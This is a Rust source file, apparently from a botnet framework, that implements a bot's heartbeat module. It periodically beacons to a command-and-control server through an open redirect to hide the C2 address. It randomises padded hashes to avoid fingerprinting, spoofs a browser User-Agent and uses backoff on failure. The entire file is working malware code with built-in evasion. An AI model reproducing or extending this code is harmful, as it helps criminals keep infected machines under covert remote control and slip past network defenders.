//! Heartbeat: stealthy bot check-in via open redirect.
//!
//! Sends periodic health check requests through a configured open redirect URL
//! to avoid direct C2 IP exposure. Each heartbeat uses a randomized padded hash
//! generated by `BotHasher` to prevent static fingerprinting.

use std::sync::Arc;
use std::time::Duration;
use reqwest::Client;
use tokio::sync::{watch, RwLock};
use tracing::{debug, error, info, warn};

use arcticfox_core::crypto::BotHasher;
use arcticfox_core::error::Result;

const DEFAULT_HEARTBEAT_INTERVAL: u64 = 300; // 5 minutes
const USER_AGENT: &str = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";

/// Heartbeat configuration (shared, dynamically updateable).
#[derive(Debug, Clone)]
struct HbConfig {
    url: String,
    interval: u64,
    enabled: bool,
}

impl Default for HbConfig {
    fn default() -> Self {
        HbConfig {
            url: String::new(),
            interval: DEFAULT_HEARTBEAT_INTERVAL,
            enabled: false,
        }
    }
}

pub struct Heartbeat {
    config: Arc<RwLock<HbConfig>>,
    client: Option<Client>,
}

impl Heartbeat {
    pub fn new() -> Self {
        Heartbeat {
            config: Arc::new(RwLock::new(HbConfig::default())),
            client: None,
        }
    }

    /// Update the heartbeat configuration dynamically.
    pub async fn update_config(&self, url: String, interval_secs: u64) {
        let mut cfg = self.config.write().await;
        let enabled = !url.is_empty();
        cfg.url = url;
        cfg.interval = interval_secs.max(30);
        cfg.enabled = enabled;
        info!(
            "Heartbeat config updated: interval={}s, enabled={}",
            cfg.interval, cfg.enabled
        );
    }

    /// Start the heartbeat background task.
    /// Returns a JoinHandle that can be awaited for graceful shutdown.
    pub fn start(
        &self,
        bot_id: String,
        hasher: BotHasher,
        client: Client,
        mut shutdown: watch::Receiver<bool>,
    ) -> tokio::task::JoinHandle<()> {
        let config = self.config.clone();

        tokio::spawn(async move {
            info!("Heartbeat worker started");
            let mut fail_count: u32 = 0;
            
            loop {
                // Wait for heartbeat to be enabled or shutdown
                let (wait_interval, enabled) = {
                    let cfg = config.read().await;
                    (cfg.interval, cfg.enabled)
                };

                if !enabled {
                    // Check every 60 seconds if heartbeat has been configured
                    tokio::select! {
                        _ = tokio::time::sleep(Duration::from_secs(60)) => {
                            continue;
                        }
                        _ = shutdown.changed() => {
                            if *shutdown.borrow() {
                                info!("Heartbeat worker shutting down");
                                return;
                            }
                            continue;
                        }
                    }
                }

                // Send heartbeat
                let padded_hash = hasher.generate_padded_hash(&bot_id);
                let url = {
                    let cfg = config.read().await;
                    cfg.url.replace("{hash}", &padded_hash)
                        .replace("{id}", &padded_hash)
                };

                debug!("Sending heartbeat: {}", url);

                match client
                    .get(&url)
                    .header("User-Agent", USER_AGENT)
                    .timeout(Duration::from_secs(15))
                    .send()
                    .await
                {
                    Ok(resp) => {
                        debug!("Heartbeat sent — status {}", resp.status());
                        // Reset fail count on success
                        fail_count = 0;
                    }
                    Err(e) => {
                        fail_count += 1;
                        let backoff = Duration::from_secs(30 * (1 << fail_count.min(6)));
                        warn!("Heartbeat failed ({}/6): {e} — backing off {}s", fail_count, backoff.as_secs());
                        tokio::select! {
                            _ = tokio::time::sleep(backoff) => continue,
                            _ = shutdown.changed() => {
                                if *shutdown.borrow() { return; }
                                continue;
                            }
                        }
                    }
                }

                // Send another client request to the tracking endpoint if configured
                // (separate from the redirect URL — could be the C2 API directly)
                // This is handled by the URL pattern matching above

                // Wait for next interval or shutdown
                tokio::select! {
                    _ = tokio::time::sleep(Duration::from_secs(wait_interval)) => {}
                    _ = shutdown.changed() => {
                        if *shutdown.borrow() {
                            info!("Heartbeat worker shutting down");
                            return;
                        }
                    }
                }
            }
        })
    }
}
